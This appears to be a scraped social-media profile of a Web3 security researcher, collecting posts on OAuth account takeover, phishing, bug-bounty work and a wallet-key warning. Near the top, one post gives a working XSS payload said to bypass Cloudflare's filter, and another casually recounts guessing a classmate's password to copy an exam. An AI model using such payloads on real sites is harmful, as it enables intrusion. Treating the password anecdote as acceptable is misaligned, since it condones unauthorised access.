souilos
@theSouilos
Security Researcher 🥷 Securing Web3 by targeting Web2 weaknesses || Born in 🇫🇷 living in 🇦🇷
XSS Payload bypassing CloudFlare <Svg%20Only=1%20OnLoad=confirm(atob(%27Q2xvdWRmbGFyZSBieXBhc3NlZA==%27))>
Very interesting: « Universal Code Execution by Chaining Messages in Browser Extensions » spaceraccoon.dev/universal-code…
Using that checklist allowed me to find an account takeover on the very first web app I checked. As more and more apps use OAuth, check that out: medium.com/@Az3m/account-…
Read “How I Found an SQL Injection in coupon code” by Ghee1337 on Medium: medium.com/@gheeX/how-i-f…
🚨 Alert for Frontier Wallet Users! 🚨 ⏩Create a new seed in a secure wallet and transfer your funds ASAP.⏪ Any website can access your private keys. Despite our attempts to contact @FrontierDotXYZ over the past year, we have received no response. ⏳📣Tech details next week.
Nice job by @theredguild very good security awareness on phishing campaigns: phishing.therektgames.com
Since its launch a year ago, my web3 security company has both paid out to security researchers & profited >$1,000,000 USD. Secured Aave, Uniswap, LayerZero, Ethena. We are celebrating with a giveaway. You need to like, retweet & comment. 4 winners, $500 each, 48hrs. Good luck🫡
My dream position? A security position in Web3, showing how Web2 attack vectors are present in Web3 hacks. Working closely with clients and security researchers to enhance protocol and user security.
OpenRedirect to XSS
This vulnerability could allow an attacker to:
- Steal user session cookies
- Perform phishing attacks
- Deface the website
- Take control of user accounts
🚨 Beware of scammers! 🚨 Certora doesn’t request NFTs at any of our events. If you see someone doing this, it’s not us. Stick to our official channels for updates and stay safe!
Is OAuth safe? It depends. If once authenticated (with Fb or Google) you can change the email address of the account without having to verify it, this can lead to account spoofing. Then if you can set a new password it’s an account takeover.
Finding vulnerabilities in malicious web apps used for phishing campaigns.
« Draw a picture of my current life based on what you know about me »
I remember my first hack; it was at university. Let’s say I was not the best student when I was not interested in something. The best student of the class had his birthday date as his Google password… I copied / pasted the whole exam and had a better grade than him.
It's unfortunate to see amazing projects or new companies making millions and underestimating security. We report bugs, it's ok if you don't wanna do security audits but PLEASE PATCH THE VULNERABILITIES FOR THE SAKE OF YOUR USERS. If you don't care, we do.
A successful phishing campaign will probably combine different techniques such as Spear Phishing + Vishing.
80% of recent losses in Web3 came from hacking people, not smart contracts. Excited to have @PabloSabbatella, OpSec & Blockchain Security researcher @_SEAL_Org, speaking at DSS 2024! In his talk "Professionals hack people, not systems", Pablo will walk you through real cases…